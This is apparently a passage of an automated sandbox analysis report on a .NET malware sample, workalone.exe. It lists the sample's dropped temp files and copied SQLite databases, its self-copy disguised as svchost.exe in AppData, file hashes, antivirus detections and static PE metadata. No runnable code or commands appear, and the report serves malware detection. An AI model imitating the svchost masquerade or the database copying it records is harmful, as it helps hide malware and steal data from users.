                                                          Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                          C:\Users\user\AppData\Local\Temp\tmpA7C0.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.691266297898928
                                                          Encrypted:false
                                                          SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                          MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                          SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                          SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                          SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                          Malicious:false
                                                          Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                          C:\Users\user\AppData\Local\Temp\tmpA7F0.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.698711683401115
                                                          Encrypted:false
                                                          SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                          MD5:47643CE7571E0C995094D7CE5F2005D7
                                                          SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                          SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                          SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                          Malicious:false
                                                          Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                          C:\Users\user\AppData\Local\Temp\tmpA81F.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.69486718145169
                                                          Encrypted:false
                                                          SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                          MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                          SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                          SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                          SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                          Malicious:false
                                                          Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                          C:\Users\user\AppData\Local\Temp\tmpA820.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694142261581685
                                                          Encrypted:false
                                                          SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                          MD5:E9AA17F314E072EBB015265FB63E77C0
                                                          SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                          SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                          SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                          Malicious:false
                                                          Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                          C:\Users\user\AppData\Local\Temp\tmpAFBA.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmpB611.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmpB641.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmpE08F.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmpE6B7.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmpE939.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\svchost\svchost.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):348672
                                                          Entropy (8bit):5.276672751026678
                                                          Encrypted:false
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          MD5:68F42F485ECE93306BEF1E4084D3052E
                                                          SHA1:C63F1A56D12A0ACBF5E9A354D8A66C6E17AF2309
                                                          SHA-256:5D526BE000146CF9CF94F7EF6F4E86929D508E17CA483B03D4ECBD2D52E071C9
                                                          SHA-512:75E09E7505039A7EB0D0652666F3ED258D50C2536BB3877C2E1503E69700AAE6A8014EF6B8F4F7F41BFA11F857CF0240F1A950F66395D19AE12707DB863C1242
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@..................................o..J.................................................................................... ............... ..H............text...LP... ...R.................. ..`.rsrc................T..............@..@.reloc...............P..............@..B................,p......H............a..........p.................................................(W...*.0..U.......~.... ....(t....-.&~....~....(.....(....&..,.&.#.+..+..~.....(....~.....(....sX...z.*...........66.......0..........~Y....:....&sZ....9....&~.....~.... ....(t....:}...&&&~.....~.... ....(t....-l&&&~.....~....~.... ....(t....(.....,M&&&~.......,G&&&.-..9......~.....(....&~....(....&...-.8h...(....8|...(....+.(....+.(....+.&...,....9#....*.8'.......................0..^........-i~....~...

                                                          C:\Users\user\AppData\Roaming\svchost\svchost.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):5.276672751026678
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:workalone.exe
                                                          File size:348672
                                                          MD5:68f42f485ece93306bef1e4084d3052e
                                                          SHA1:c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
                                                          SHA256:5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
                                                          SHA512:75e09e7505039a7eb0d0652666f3ed258d50c2536bb3877c2e1503e69700aae6a8014ef6b8f4f7f41bfa11f857cf0240f1a950f66395d19ae12707db863c1242
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          TLSH:747439267384DF26C79223B7C6035BA002184C197785EE76A4E529FC94A1FFAD9CF193
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:64c68eb2b3b686c4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x427046
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x63865450 [Tue Nov 29 18:49:52 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x26ffc0x4a.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x2faa4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
